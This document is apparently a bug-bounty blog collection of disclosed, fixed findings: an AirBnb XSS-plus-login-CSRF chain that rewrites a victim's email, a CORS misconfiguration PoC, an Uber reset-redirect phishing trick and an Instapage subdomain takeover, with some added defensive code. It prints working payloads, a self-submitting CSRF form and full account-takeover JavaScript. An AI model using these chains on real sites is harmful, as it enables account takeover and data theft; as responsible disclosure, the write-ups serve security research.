AirBnb Bug Bounty: Turning Self-XSS into Good-XSS #2

Hello guys 🙂

So this post is about one of my most interesting finds while participating in bug bounty programs. Interesting because it is a combination of several issues at AirBnb.

For those who don't know, AirBnb runs a public program at HackerOne, and I would suggest participating in it.

Here is the list of issues I found while doing research and chained to escalate further.

  1. Injecting XSS payload via True-Client-IP header.
  2. Exploiting login/logout CSRF.
  3. Escalating Self Stored XSS to change the victim's account email.

Let's go into the details.

Injecting XSS payload via True-Client-IP header:

Airbnb used to track users' IP addresses and show them under the user's security settings, so that users are aware of which IPs or locations their account was previously logged in from, for example in case someone else reused their password.

It's good practice to give users a feeling of security, but not if it isn't implemented well.

This is how users can see their login history under the security settings:

[Screenshot: login_track]

If you hover your pointer over the ? icon, the IP address of the source machine is shown, so my initial thought was to spoof the source IP, as I had heard about that before here.

I came to know that I could spoof the IP with any IP by sending a True-Client-IP header with the login request; as a result, we can show any desired IP in the login history.

It's good, but still not convincing enough to report, as it is something we can only do with our own account; for others we would need their password, which is obviously not an acceptable case.

Credit goes to Parth for throwing in the idea of trying other strings instead of an IP in True-Client-IP. I did, and any string got reflected under the security settings directly, so now we could just think about getting XSS, and I got it.

Giving an XSS payload instead of an IP in the True-Client-IP header did the work:

POST /authenticate HTTP/1.1
Host: www.airbnb.co.in
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-CSRF-Token: V4$.airbnb.co.in$CpeQjCEtXnk$D7u8JuX39keALZgtvsmD3wr0_unmJBU3hVmj71h0Xlc=
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Referer: https://www.airbnb.co.in/
True-Client-IP: <h1>XSS</h1></center><script>alert(document.domain)</script>
Content-Length: 198
Cookie: [REDACTED]
Connection: close

utf8=✓&authenticity_token=[REDACTED]&from=email_login&airlock_id=&email=[REDACTED]&password=[REDACTED]

And this is how I managed to get a self stored XSS under the security settings.

Whenever I make a request to the security page, the self stored XSS gets executed.

[Screenshot: xss_airbnb]

Exploiting login/logout CSRF:

As I noticed there was no CSRF protection on login as well as logout, I could easily make anyone get logged out of their account, logged into my account, and redirected to the security page, where the XSS would execute in the victim's browser.

CSRF PoC code for the same:

<html>
  <body>
    <center> <br>
      <form action="https://www.airbnb.co.in/authenticate" method="POST">
        <input type="hidden" name="utf8" value="✓" />
        <input type="hidden" name="authenticity_token" value="" />
        <input type="hidden" name="from" value="email_login" />
        <input type="hidden" name="airlock_id" value="" />
        <input type="hidden" name="email" value="attackers@email.com" />
        <input type="hidden" name="password" value="attacker@password" />
        <input type="hidden" name="form_remember_browser" value="yes" />
        <input type="hidden" name="redirect_params" value="https://www.airbnb.co.in/users/security/78323762" />
        <input type="submit" value="XSS ME" />
      </form>
      <script>
        document.forms[0].submit();
      </script>
    </center>
  </body>
</html>

This could have been enough to report, but I still wanted to check whether I could escalate further; my thought was to exploit this in the victim's account instead of making the victim log into my account.

Escalation of Self Stored XSS to change the victim's account email:

At AirBnb, social login is also an option, so users can use their Google or Facebook account, and I found a way to make this XSS exploitable for users who use social login to access AirBnb.

This can be done in the following way:

  • Instead of a normal XSS payload, inject remotely hosted JS.
  • The victim logs into the attacker's account via CSRF.
  • The attacker's remotely hosted JS gets executed.
  • The JS performs 4 actions in iframes, which are as follows:
    • The victim is logged out of the attacker's account.
    • The victim is logged into their own account via Google Sign in.
    • The attacker navigates to the Profile Settings page.
    • The attacker extracts the CSRF token from the page source.
    • The attacker updates the victim's email.

Looks complex? But JavaScript will do it all at once. I need to mention some minor things which help to make the scenario successful.

The X-Frame-Options header is set to sameorigin, so I was able to make those 4 different requests via iframes in the context of the airbnb host.

Social login users don't have password re-authentication while changing the email, and once we have changed it, we can reset the account via the password reset process.

Putting it all together:

// Shown on the page while the iframes below do the work.
document.body.innerHTML = '<html><body><center><h1>Testing :)</h1></center></body></html>';

// 1. Log the victim out of the attacker's account.
var profileIframe = document.createElement('iframe');
profileIframe.setAttribute('src', 'https://www.airbnb.co.in/logout');
profileIframe.setAttribute('id', 'pi');
document.body.appendChild(profileIframe);

document.getElementById('pi').onload = function () {
  // 2. Log the victim into their own account via Google sign in.
  var profileIframe1 = document.createElement('iframe');
  profileIframe1.setAttribute('src', 'https://www.airbnb.co.in/oauth_connect?from=google_login&service=google');
  profileIframe1.setAttribute('id', 'lo1');
  document.body.appendChild(profileIframe1);

  document.getElementById('lo1').onload = function () {
    // 3. Open the profile settings page.
    var profileIframe2 = document.createElement('iframe');
    profileIframe2.setAttribute('src', 'https://www.airbnb.co.in/users/edit');
    profileIframe2.setAttribute('id', 'po');
    document.body.appendChild(profileIframe2);

    document.getElementById('po').onload = function () {
      // 4. The iframe is same-origin, so its DOM is readable: pull the CSRF
      // token, the user id (from the edit_verification link) and the current
      // profile fields out of the page source.
      var lol = document.getElementById('po').contentWindow.document.body.innerHTML;
      var ha = lol.split('"authenticity_token" type="hidden" value="');
      var na = ha[1].split('"');

      var ha2 = lol.split('https://www.airbnb.co.in/users/edit_verification/');
      var na2 = ha2[1].split('"');

      // Current first name, last name and email (extracted, not used in the request below).
      var ha22 = lol.split('"user[first_name]" size="30" type="text" value="');
      var na22 = ha22[1].split('"');

      var ha221 = lol.split('"user[last_name]" size="30" type="text" value="');
      var na221 = ha221[1].split('"');

      var ha222 = lol.split('"user[email]" size="30" type="text" value="');
      var na222 = ha222[1].split('"');

      // Submit the profile update with the harvested token and user id.
      function submitRequest() {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https://www.airbnb.co.in/update/" + na2[0], true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xhr.withCredentials = true;
        // utf8=✓ written as the raw UTF-8 bytes of the check mark (\xe2\x9c\x93),
        // because the body is sent byte-by-byte below.
        var body = "utf8=\xe2\x9c\x93&authenticity_token=" + na[0] + "&user[first_name]=Got&user[last_name]=Hacked&user[email]=gothacked@hacker.com&user_id=" + na2[0];
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++) {
          aBody[i] = body.charCodeAt(i);
        }
        xhr.send(new Blob([aBody]));
      }
      submitRequest();
    };
  };
};

Later, Airbnb fixed the issue by removing the Login History feature from the account settings, which was the root cause of the issue.

Video PoC:

Conclusion:

  • Sometimes multiple minor flaws can be chained into impactful attacks, so it's better to consider these minor issues in the first place to avoid bigger issues later.

The escalation (and the title) must be reminding you of something you have seen before: here is that awesome write up by fin1te. Credit to him for his writeup that shared the idea of escalation, and to Parth for helping me with JavaScript problems 🙂

Do let me know your thoughts about it in the comments 🙂

Exploiting Misconfigured CORS (Cross Origin Resource Sharing)

Hey friends 🙂

A few days ago I noticed a blog post about exploiting Facebook chat and reading all the chats of users, which made me interested in knowing about the issue. Basically it was a misconfigured CORS configuration where the null origin is allowed with credentials set to true. It was not something I had heard of for the first time; @albinowax from PortSwigger explained it very well in his blog post. So after reading that Messenger blog post I went to test for the same issue on some targets where I was allowed to test it.

But before that, here are some tips about CORS and when it can be exploitable from an attacker's point of view:

  • Poorly implemented, Best case for Attack:

Access-Control-Allow-Origin: https://attacker.com

Access-Control-Allow-Credentials: true

  • Poorly implemented, Exploitable:

Access-Control-Allow-Origin: null

Access-Control-Allow-Credentials: true

  • Bad implementation but not exploitable:

Access-Control-Allow-Origin: *

Access-Control-Allow-Credentials: true

or just

Access-Control-Allow-Origin: *

Even this is not good from a development point of view, but due to the rules of CORS itself, if Access-Control-Allow-Origin is set to * we don't get the benefit of Access-Control-Allow-Credentials: true, which means no access to the victim's cookies.

I am not going to go deeper into CORS, as the earlier blog post covered it very well.
So above I mentioned 3 cases, where the first two are exploitable. An example of the 2nd case is that Facebook Messenger chat issue which I mentioned in the earlier section of the post, and an example of the 1st case is mine, which I found only 2 days ago, where any arbitrary Origin is allowed and the same Origin is reflected back in Access-Control-Allow-Origin with credentials set to true. The best way I found to check for CORS issues is using curl.

e.g. curl https://test.victim.com -H "Origin: https://geekboy.ninja" -I and check the response to see whether the Origin is reflected or not.

Or, if you are a Burp Pro user, Burp Active Scan may find this for you, but in my case it didn't; I don't know the reason. When I curled my target manually with curl https://my.target.com -H "Origin: https://geekboy.ninja" -I the Origin didn't get reflected, but when I curled the specific endpoint where all the user's data comes back in the response, curl https://my.target.com/api/web/user -H "Origin: https://geekboy.ninja" -I, it reflected my host back with credentials set to true, and that's enough to make this work and steal all that data.

I made a quick PoC code for it:

function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      // The browser lets us read the response because the server reflected
      // our Origin with Access-Control-Allow-Credentials: true.
      alert(this.responseText);
      var out = document.getElementById("demo");
      if (out) out.innerText = this.responseText;
    }
  };
  xhttp.open("GET", "https://my.target.com/api/web/user", true);
  xhttp.withCredentials = true; // send the victim's cookies with the request
  xhttp.send();
}

And here is how it worked 🙂

Sources for better understanding of CORS:

Views/Suggestions/Edits always welcome 🙂
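The curl check above comes down to reading two response headers and comparing them with the Origin you sent. The following is an added example, not the post's PoC and not any target's code, that does that comparison on a captured header block and sorts the result into the three cases listed earlier; beside it are the weak header logic that produces the reflected case and a strict allowlist version. The hostnames, the sample response and the allowlist are constructed for the example.

```javascript
// Added example (not the post's PoC, not any target's code): classify a CORS
// response from a probe, and contrast origin reflection with an allowlist.
// Hostnames, the sample response and ALLOWED_ORIGINS are constructed here.

// Parse a header block as printed by `curl -I` into a lower-cased map.
function parseHeaderBlock(text) {
  const headers = {};
  for (const line of text.split(/\r?\n/)) {
    const idx = line.indexOf(':');
    if (idx === -1) continue; // status line or blank line
    headers[line.slice(0, idx).trim().toLowerCase()] = line.slice(idx + 1).trim();
  }
  return headers;
}

function lowerKeys(h) {
  const out = {};
  for (const k of Object.keys(h)) out[k.toLowerCase()] = h[k];
  return out;
}

// `probeOrigin` is the Origin sent in the probe. It must be one the server has
// no reason to allow (your own test domain, as in the curl commands above);
// only then does seeing it echoed back mean arbitrary origins are accepted.
function classifyCors(probeOrigin, responseHeaders) {
  const h = lowerKeys(responseHeaders);
  const acao = h['access-control-allow-origin'];
  const withCredentials = h['access-control-allow-credentials'] === 'true';
  if (acao === undefined) return 'no-cors';
  // Browsers refuse to pair '*' with credentials, so cookies never flow.
  if (acao === '*') return 'wildcard';
  if (acao === 'null' && withCredentials) return 'null-origin-with-credentials';
  if (acao === probeOrigin && withCredentials) return 'reflected-origin-with-credentials';
  if (acao === probeOrigin) return 'reflected-origin-without-credentials';
  return 'restricted';
}

// Weak setting: echo whatever Origin arrives. This is the behaviour the
// /api/web/user endpoint showed.
function reflectingCorsHeaders(origin) {
  return { 'Access-Control-Allow-Origin': origin, 'Access-Control-Allow-Credentials': 'true' };
}

// Corrected setting: exact match of the full origin (scheme + host + port)
// against a fixed set. Prefix, suffix or regex matches are a common mistake.
const ALLOWED_ORIGINS = new Set(['https://app.example.com', 'https://admin.example.com']);

function allowlistCorsHeaders(origin) {
  if (typeof origin !== 'string' || !ALLOWED_ORIGINS.has(origin)) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin', // the response depends on Origin; caches must not mix them
  };
}

// Constructed sample: what `curl -I` printed for the vulnerable endpoint.
const SAMPLE_RESPONSE = [
  'HTTP/1.1 200 OK',
  'Content-Type: application/json',
  'Access-Control-Allow-Origin: https://geekboy.ninja',
  'Access-Control-Allow-Credentials: true',
].join('\r\n');
```

One caveat for the classifier: a single probe cannot tell an allowlisted origin from a reflected one, which is why the probe origin has to be a domain the target would never legitimately allow. Also note that curl -I sends a HEAD request; some servers only attach the CORS headers to GET, so repeat the check with the real method when HEAD shows nothing.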

Starting Bug Bounty ? | Bug Bounty Resources

Hey all 🙂

This post is not about any of my findings; it's about bug bounty resources for learners. No matter whether you are just starting out or experienced, there is always something to learn from others.

And if you are just starting in bug bounty then surely this is going to be a helpful post, and kind of necessary, as nowadays I have seen many new guys starting bug bounty after seeing that $$. It's good that you want to make $$ from it, but before that you should understand the process, quality and report writing, which will help you to make more $$, so it's better to understand first and then go for it.

So here I am going to add some links which have lots of info, resources and writeups about what I was talking about before.

Apart from this, here are some GitHub projects which maintain a huge list of categorized writeups and links to blogs of frequent and successful bug hunters.

All the resources were originally shared by HackerOne, BugCrowd, Jack, Philippe, Alphr, Chan Ngai Long, Dheeraj Joshi.

Hope it will be useful.

 

Uber | Exploiting Stored URL Redirect in Password Reset Token

Hello Friends !

While trying my luck with Uber I came across a weird behaviour in the application which is not very common in today's world.

I was messing around with the password reset token generation of Uber. While requesting a password reset link, I appended a known GET parameter to the password reset request which I had noticed before while checking for URL redirect issues in their OAuth implementation.

It was the NEXT parameter, which is responsible for the next URL or page after a successful login.

So now come to the password reset page. Normally the Uber password reset page URL looks like: https://login.uber.com/forgot-password , whereas the crafted URL looks like: https://login.uber.com/forgot-password?source=auth&next_url=evil.com .

So once a user requests a password reset token via the crafted link, the user will get the password reset token, and once the user sets their new password, they will be redirected to evil.com.

It's a bug, but as we know Uber doesn't accept URL redirect issues unless there is something special. As the URL redirect takes place during password reset, I needed to take advantage of it.

I made a form which looks the same as the Uber form, asking for Confirm Password after the user sets their new password, which looks like:

[Screenshot: pass]

I used the data: scheme to make sure it looks more legit instead of using any direct URL.

So now the scenario is:

  • The attacker requests a password reset token via the crafted link.
  • Let's assume the user resets their password via the reset link.
  • The user sets and confirms the new password.
  • The attacker gets the user's new password.

As we can see it's not a win-win case; we still depend on the user choosing to reset their account or not, but it may still happen, and in that situation the attacker gets the password of the user's account. So Uber decided to fix it once I reported it, and they were very quick to acknowledge the report. I would suggest participating in the Uber bug bounty program.

Here is the video PoC:
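The underlying defect is a redirect parameter that is passed through unvalidated. The following is an added example of how a login service can validate such a parameter so the post-reset redirect can only land on its own site; it is not Uber's code. It assumes a Node.js handler, a LOGIN_ORIGIN constant, a default landing path, and that the parameter is named next_url as in the crafted URL above.

```javascript
// Added example (not Uber's code): restricting a post-login / post-reset
// redirect parameter to site-relative paths. LOGIN_ORIGIN, DEFAULT_PATH and
// the parameter name are assumptions for the example.
const LOGIN_ORIGIN = 'https://login.uber.com';
const DEFAULT_PATH = '/';

// Returns a path + query on our own origin, or DEFAULT_PATH if the value
// cannot be trusted. Everything that is not a site-relative path is rejected:
// absolute URLs ("https://evil.com", "data:..."), protocol-relative
// ("//evil.com", "/\evil.com") and bare hosts ("evil.com", which a naive
// Location header would send the browser to).
function safeNextUrl(next) {
  if (typeof next !== 'string' || next.length === 0) return DEFAULT_PATH;
  if (next[0] !== '/' || next[1] === '/' || next[1] === '\\') return DEFAULT_PATH;
  let resolved;
  try {
    resolved = new URL(next, LOGIN_ORIGIN);
  } catch (e) {
    return DEFAULT_PATH;
  }
  // Resolution must not have left our origin, and the normalised path must not
  // itself begin with "//" (e.g. after "/..//host" collapses), because a
  // Location of "//host" is protocol-relative again.
  if (resolved.origin !== LOGIN_ORIGIN || resolved.pathname.startsWith('//')) return DEFAULT_PATH;
  return resolved.pathname + resolved.search;
}

// The Location header for the redirect issued after a successful reset:
// always absolute, always on LOGIN_ORIGIN.
function redirectAfterReset(query) {
  return LOGIN_ORIGIN + safeNextUrl(query.next_url);
}
```

Returning the re-assembled path rather than the original string is deliberate: the browser then never sees the attacker's raw input, and the prefix LOGIN_ORIGIN is added by the server, so the only thing the parameter can influence is which page on the site the user lands on.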

HackerOne Report Thread #163067

Hijacking tons of Instapage expired users Domains & Subdomains

Hello all 🙂

So this post is about how I was able to hijack tons of domains/subdomains of Instapage users whose service had expired.

What is Instapage?

Instapage is a service that lets you build landing pages for your online marketing and promotion campaigns with ease. It offers features such as A/B Testing, multiple campaign management, easy page building, and a lot more!

It also allows users to map their templates onto their own domains or subdomains.

How did I find it?

As I am one of the researchers on the HackerOne platform, I was trying to find something on HackerOne itself, as I wanted that Hacking Hackers badge on my profile.

I found hacker.one in the in-scope domain list; it is one of the official websites of HackerOne. When I visited it, I saw an error which caught my eye, and after figuring it out, I came to know it was an Instapage error which occurs when the service has expired or the domain or subdomain is not linked properly. It took just a few minutes to figure out that I could publish my own template to any of the misconfigured and expired Instapage domains/subdomains, and luckily HackerOne was one of their users.

Instapage error on hacker.one:

[Screenshot: bxwvtem]

Vulnerable POST request:

POST /ajax/builder2/publish/2340488 HTTP/1.1
Host: app.instapage.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://app.instapage.com/builder2?id=2340488
Content-Length: 31
Cookie: cookie_value
Connection: close

version=1&url=www.hacker.one

where the url parameter value contains the vulnerable domain.

hacker.one domain takeover:

[Screenshot: insta-0day]

Here is the video PoC:

With the help of a Google dork and the Instapage error, I found tons of websites that are vulnerable to this, and anyone could take them over and put their own content on them. I contacted Instapage via HackerOne.

HackerOne fixed it right after the report by removing the CNAME entry pointing to Instapage, and later Instapage fixed it completely; I got confirmation of the fix via the HackerOne report thread.

Thanks to HackerOne for being a mediator in contacting Instapage and fixing things the correct way.

HackerOne report thread : #159156